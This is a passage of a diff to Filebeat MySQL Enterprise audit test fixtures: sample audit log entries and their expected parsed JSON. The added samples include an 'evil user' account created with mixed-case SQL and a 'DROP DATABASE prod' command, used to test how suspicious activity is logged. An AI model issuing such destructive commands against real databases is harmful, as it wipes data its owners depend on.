"GRANT ALL PRIVILEGES ON *.* TO 'root'@'%'", "status": 1410 } }, { "timestamp": "2020-10-19 19:29:36", "id": 0, "class": "general", "event": "status", "connection_id": 15, "account": { "user": "root", "host": "localhost" }, "login": { "user": "root", "os": "", "ip": "", "proxy": "" }, "general_data": { "command": "Query", "sql_command": "create_user", "query": "CREATE USER 'audit_test_user'@'localhost' IDENTIFIED BY ", "status": 1396 } }, -{ "timestamp": "2020-10-19 19:30:00", "id": 0, "class": "general", "event": "status", "connection_id": 15, "account": { "user": "root", "host": "localhost" }, "login": { "user": "root", "os": "", "ip": "", "proxy": "" }, "general_data": { "command": "Query", "sql_command": "create_user", "query": "CREATE USER 'audit_test_user2'@'hades.home' IDENTIFIED BY ", "status": 0 } }, +{ "timestamp": "2020-10-19 19:30:00", "id": 0, "class": "general", "event": "status", "connection_id": 15, "account": { "user": "root", "host": "localhost" }, "login": { "user": "root", "os": "", "ip": "", "proxy": "" }, "general_data": { "command": "Query", "sql_command": "create_user", "query": "CREATE USER IF NOT EXISTS 'audit_test_user2'@'hades.home' IDENTIFIED BY ", "status": 0 } }, { "timestamp": "2020-10-19 19:30:18", "id": 0, "class": "general", "event": "status", "connection_id": 15, "account": { "user": "root", "host": "localhost" }, "login": { "user": "root", "os": "", "ip": "", "proxy": "" }, "general_data": { "command": "Query", "sql_command": "grant", "query": "GRANT ALL PRIVILEGES ON *.* TO ‘audit_test_user2’@’hades.home’", "status": 1410 } }, { "timestamp": "2020-10-19 19:30:32", "id": 0, "class": "general", "event": "status", "connection_id": 15, "account": { "user": "root", "host": "localhost" }, "login": { "user": "root", "os": "", "ip": "", "proxy": "" }, "general_data": { "command": "Query", "sql_command": "grant", "query": "GRANT ALL PRIVILEGES ON *.* TO 'audit_test_user'@'hades.home'", "status": 1410 } }, { "timestamp": "2020-10-19 19:30:49", "id": 0, "class": "general", "event": "status", "connection_id": 15, "account": { "user": "root", "host": "localhost" }, "login": { "user": "root", "os": "", "ip": "", "proxy": "" }, "general_data": { "command": "Query", "sql_command": "grant", "query": "GRANT ALL PRIVILEGES ON *.* TO 'audit_test_user'@'hades.home'", "status": 1410 } }, @@ -29,3 +29,6 @@ { "timestamp": "2020-10-19 19:32:10", "id": 0, "class": "connection", "event": "disconnect", "connection_id": 16, "account": { "user": "audit_test_user2", "host": "hades.home" }, "login": { "user": "audit_test_user2", "os": "", "ip": "192.168.2.5", "proxy": "" }, "connection_data": { "connection_type": "ssl" } }, { "timestamp": "2020-10-19 19:32:12", "id": 0, "class": "connection", "event": "disconnect", "connection_id": 15, "account": { "user": "root", "host": "localhost" }, "login": { "user": "root", "os": "", "ip": "", "proxy": "" }, "connection_data": { "connection_type": "socket" } }, { "timestamp": "2020-10-19 19:32:16", "id": 0, "class": "audit", "event": "shutdown", "connection_id": 0, "shutdown_data": { "server_id": 1 } } +{ "timestamp": "2021-02-10 19:05:42", "id": 2, "class": "audit", "event": "status", "connection_id": 42, "account": { "user": "adrian", "host": "elastic" }, "login": { "user": "adrian", "os": "", "ip": "192.168.7.76", "proxy": "" }, "general_data": { "command": "Query", "sql_command": "create_user", "query": "crEAtE uSeR 'evil user'@elastic IDENTIFIED BY ", "status": 1396 } }, +{ "timestamp": "2021-02-10 19:05:42", "id": 2, "class": "audit", "event": "status", "connection_id": 42, "account": { "user": "adrian", "host": "elastic" }, "login": { "user": "evil user", "os": "", "ip": "192.168.7.76", "proxy": "" }, "general_data": { "command": "Query", "sql_command": "drop_db", "query": "DROP DATABASE prod", "status": 1396 } }, +{ "timestamp": "2021-02-10 19:05:42", "id": 2, "class": "audit", "event": "status", "connection_id": 42, "account": { "user": "adrian", "host": "elastic" }, "login": { "user": "evil user", "os": "", "ip": "192.168.7.76", "proxy": "" }, "general_data": { "command": "Query", "sql_command": "drop_user", "query": "DrOp usEr IF EXISTS 'evil user'@%", "status": 1396 } }, diff --git a/x-pack/filebeat/module/mysqlenterprise/audit/test/mysql_audit_test.log-expected.json b/x-pack/filebeat/module/mysqlenterprise/audit/test/mysql_audit_test.log-expected.json index 48e4c2fa161f..e563f918ac73 100644 --- a/x-pack/filebeat/module/mysqlenterprise/audit/test/mysql_audit_test.log-expected.json +++ b/x-pack/filebeat/module/mysqlenterprise/audit/test/mysql_audit_test.log-expected.json @@ -8,6 +8,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:21:33\", \"id\": 0, \"class\": \"audit\", \"event\": \"startup\", \"connection_id\": 0, \"account\": { \"user\": \"skip-grants user\", \"host\": \"\" }, \"login\": { \"user\": \"\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"startup_data\": { \"server_id\": 1, \"os_version\": \"x86_64-Linux\", \"mysql_version\": \"8.0.22-commercial\", \"args\": [\"/usr/local/mysql/bin/mysqld\", \"--loose-audit-log-format=JSON\", \"--log-error=log.err\", \"--pid-file=mysqld.pid\", \"--port=3306\" ] } },", "event.outcome": "unknown", "event.timezone": "-02:00", "fileset.name": "audit", @@ -50,6 +51,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:25:51\", \"id\": 0, \"class\": \"connection\", \"event\": \"connect\", \"connection_id\": 13, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"connection_data\": { \"connection_type\": \"socket\", \"status\": 0, \"db\": \"\", \"connection_attributes\": { \"_pid\": \"33038\", \"_platform\": \"x86_64\", \"_os\": \"Linux\", \"_client_name\": \"libmysql\", \"os_user\": \"root\", \"_client_version\": \"8.0.22\" } } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -73,6 +75,9 @@ "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", "process.pid": 33038, + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -92,6 +97,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:25:51\", \"id\": 1, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 13, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"select\", \"query\": \"select @@version_comment limit 1\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -110,6 +116,9 @@ "mysqlenterprise.audit.id": 1, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -129,6 +138,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:25:52\", \"id\": 0, \"class\": \"connection\", \"event\": \"disconnect\", \"connection_id\": 13, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"connection_data\": { \"connection_type\": \"socket\" } },", "event.outcome": "unknown", "event.timezone": "-02:00", "event.type": [ @@ -145,6 +155,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -165,6 +178,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:27:45\", \"id\": 0, \"class\": \"connection\", \"event\": \"connect\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"connection_data\": { \"connection_type\": \"socket\", \"status\": 0, \"db\": \"\", \"connection_attributes\": { \"_pid\": \"33197\", \"_platform\": \"x86_64\", \"_os\": \"Linux\", \"_client_name\": \"libmysql\", \"os_user\": \"root\", \"_client_version\": \"8.0.22\" } } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -188,6 +202,9 @@ "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", "process.pid": 33197, + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -207,6 +224,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:27:45\", \"id\": 1, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"select\", \"query\": \"select @@version_comment limit 1\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -225,6 +243,9 @@ "mysqlenterprise.audit.id": 1, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -245,6 +266,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:27:50\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"grant\", \"query\": \"GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'password'\", \"status\": 1064 } },", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ @@ -263,6 +285,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -283,6 +308,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:28:04\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"grant\", \"query\": \"GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'password'\", \"status\": 1064 } },", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ @@ -301,6 +327,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -321,6 +350,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:28:27\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"grant\", \"query\": \"GRANT ALL PRIVILEGES ON *.* TO 'root'@'hades.home' IDENTIFIED BY 'password'\", \"status\": 1064 } },", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ @@ -339,6 +369,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -359,6 +392,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:28:54\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"grant\", \"query\": \"GRANT ALL PRIVILEGES ON *.* TO 'root'@'%'\", \"status\": 1410 } },", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ @@ -377,6 +411,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -397,11 +434,14 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:29:36\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"create_user\", \"query\": \"CREATE USER 'audit_test_user'@'localhost' IDENTIFIED BY \", \"status\": 1396 } },", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ "access", - "connection" + "connection", + "user", + "creation" ], "fileset.name": "audit", "input.type": "log", @@ -415,14 +455,21 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ - "root" + "root", + "audit_test_user" ], "server.user.name": "root", "service.type": "mysqlenterprise", "tags": [ "mysqlenterprise-audit" - ] + ], + "user.name": "root", + "user.target.domain": "localhost", + "user.target.name": "audit_test_user" }, { "@timestamp": "2020-10-19T19:30:00.000Z", @@ -435,11 +482,14 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:30:00\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"create_user\", \"query\": \"CREATE USER IF NOT EXISTS 'audit_test_user2'@'hades.home' IDENTIFIED BY \", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ "access", - "connection" + "connection", + "user", + "creation" ], "fileset.name": "audit", "input.type": "log", @@ -447,20 +497,27 @@ "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 15, "mysqlenterprise.audit.general_data.command": "Query", - "mysqlenterprise.audit.general_data.query": "CREATE USER 'audit_test_user2'@'hades.home' IDENTIFIED BY ", + "mysqlenterprise.audit.general_data.query": "CREATE USER IF NOT EXISTS 'audit_test_user2'@'hades.home' IDENTIFIED BY ", "mysqlenterprise.audit.general_data.sql_command": "create_user", "mysqlenterprise.audit.general_data.status": 0, "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ - "root" + "root", + "audit_test_user2" ], "server.user.name": "root", "service.type": "mysqlenterprise", "tags": [ "mysqlenterprise-audit" - ] + ], + "user.name": "root", + "user.target.domain": "hades.home", + "user.target.name": "audit_test_user2" }, { "@timestamp": "2020-10-19T19:30:18.000Z", @@ -473,6 +530,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:30:18\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"grant\", \"query\": \"GRANT ALL PRIVILEGES ON *.* TO \u2018audit_test_user2\u2019@\u2019hades.home\u2019\", \"status\": 1410 } },", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ @@ -481,7 +539,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 4645, + "log.offset": 4659, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 15, "mysqlenterprise.audit.general_data.command": "Query", @@ -491,6 +549,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -511,6 +572,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:30:32\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"grant\", \"query\": \"GRANT ALL PRIVILEGES ON *.* TO 'audit_test_user'@'hades.home'\", \"status\": 1410 } },", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ @@ -519,7 +581,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 5031, + "log.offset": 5045, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 15, "mysqlenterprise.audit.general_data.command": "Query", @@ -529,6 +591,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -549,6 +614,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:30:49\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"grant\", \"query\": \"GRANT ALL PRIVILEGES ON *.* TO 'audit_test_user'@'hades.home'\", \"status\": 1410 } },", "event.outcome": "failure", "event.timezone": "-02:00", "event.type": [ @@ -557,7 +623,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 5408, + "log.offset": 5422, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 15, "mysqlenterprise.audit.general_data.command": "Query", @@ -567,6 +633,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -587,6 +656,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:31:01\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 15, \"account\": { \"user\": \"root\", \"host\": \"localhost\" }, \"login\": { \"user\": \"root\", \"os\": \"\", \"ip\": \"\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"grant\", \"query\": \"GRANT ALL PRIVILEGES ON *.* TO 'audit_test_user2'@'hades.home'\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -595,7 +665,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 5785, + "log.offset": 5799, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 15, "mysqlenterprise.audit.general_data.command": "Query", @@ -605,6 +675,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "root", "process.name": "mysqld", + "related.hosts": [ + "localhost" + ], "related.user": [ "root" ], @@ -626,6 +699,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:31:25\", \"id\": 0, \"class\": \"connection\", \"event\": \"connect\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"connection_data\": { \"connection_type\": \"ssl\", \"status\": 0, \"db\": \"\", \"connection_attributes\": { \"_os\": \"Linux\", \"_client_name\": \"libmysql\", \"_pid\": \"394499\", \"_client_version\": \"5.7.30\", \"_platform\": \"x86_64\" } } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -635,7 +709,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 6160, + "log.offset": 6174, "mysqlenterprise.audit.class": "connection", "mysqlenterprise.audit.connection_data.connection_attributes._client_name": "libmysql", "mysqlenterprise.audit.connection_data.connection_attributes._client_version": "5.7.30", @@ -648,6 +722,9 @@ "mysqlenterprise.audit.login.user": "audit_test_user2", "process.name": "mysqld", "process.pid": 394499, + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -671,6 +748,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:31:25\", \"id\": 1, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"select\", \"query\": \"select @@version_comment limit 1\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -679,7 +757,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 6638, + "log.offset": 6652, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.general_data.command": "Query", @@ -689,6 +767,9 @@ "mysqlenterprise.audit.id": 1, "mysqlenterprise.audit.login.user": "audit_test_user2", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -712,6 +793,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:31:31\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"create_db\", \"query\": \"create database audit_test\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -720,7 +802,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 7020, + "log.offset": 7034, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.general_data.command": "Query", @@ -730,6 +812,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "audit_test_user2", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -753,6 +838,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:31:40\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"select\", \"query\": \"SELECT DATABASE()\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -761,7 +847,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 7399, + "log.offset": 7413, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.general_data.command": "Query", @@ -771,6 +857,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "audit_test_user2", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -794,6 +883,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:31:40\", \"id\": 1, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Init DB\", \"sql_command\": \"error\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -802,7 +892,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 7766, + "log.offset": 7780, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.general_data.command": "Init DB", @@ -811,6 +901,9 @@ "mysqlenterprise.audit.id": 1, "mysqlenterprise.audit.login.user": "audit_test_user2", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -834,6 +927,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:31:40\", \"id\": 2, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"show_databases\", \"query\": \"show databases\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -842,7 +936,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 8104, + "log.offset": 8118, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.general_data.command": "Query", @@ -852,6 +946,9 @@ "mysqlenterprise.audit.id": 2, "mysqlenterprise.audit.login.user": "audit_test_user2", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -875,6 +972,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:31:40\", \"id\": 3, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"show_tables\", \"query\": \"show tables\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -883,7 +981,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 8476, + "log.offset": 8490, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.general_data.command": "Query", @@ -893,6 +991,9 @@ "mysqlenterprise.audit.id": 3, "mysqlenterprise.audit.login.user": "audit_test_user2", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -916,6 +1017,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:31:47\", \"id\": 0, \"class\": \"general\", \"event\": \"status\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"general_data\": { \"command\": \"Query\", \"sql_command\": \"create_table\", \"query\": \"CREATE TABLE audit_test_table (firstname VARCHAR(20), lastname VARCHAR(20))\", \"status\": 0 } },", "event.outcome": "success", "event.timezone": "-02:00", "event.type": [ @@ -924,7 +1026,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 8842, + "log.offset": 8856, "mysqlenterprise.audit.class": "general", "mysqlenterprise.audit.connection_id": 16, "mysqlenterprise.audit.general_data.command": "Query", @@ -934,6 +1036,9 @@ "mysqlenterprise.audit.id": 0, "mysqlenterprise.audit.login.user": "audit_test_user2", "process.name": "mysqld", + "related.hosts": [ + "hades.home" + ], "related.ip": [ "192.168.2.5" ], @@ -957,6 +1062,7 @@ "event.dataset": "mysqlenterprise.audit", "event.kind": "event", "event.module": "mysqlenterprise", + "event.original": "{ \"timestamp\": \"2020-10-19 19:31:57\", \"id\": 0, \"class\": \"table_access\", \"event\": \"insert\", \"connection_id\": 16, \"account\": { \"user\": \"audit_test_user2\", \"host\": \"hades.home\" }, \"login\": { \"user\": \"audit_test_user2\", \"os\": \"\", \"ip\": \"192.168.2.5\", \"proxy\": \"\" }, \"table_access_data\": { \"db\": \"audit_test\", \"table\": \"audit_test_table\", \"query\": \"INSERT INTO audit_test_table values ('John', 'Smith')\", \"sql_command\": \"insert\" } },", "event.outcome": "unknown", "event.timezone": "-02:00", "event.type": [ @@ -965,7 +1071,7 @@ ], "fileset.name": "audit", "input.type": "log", - "log.offset": 9273, + "log.offset": 9287, 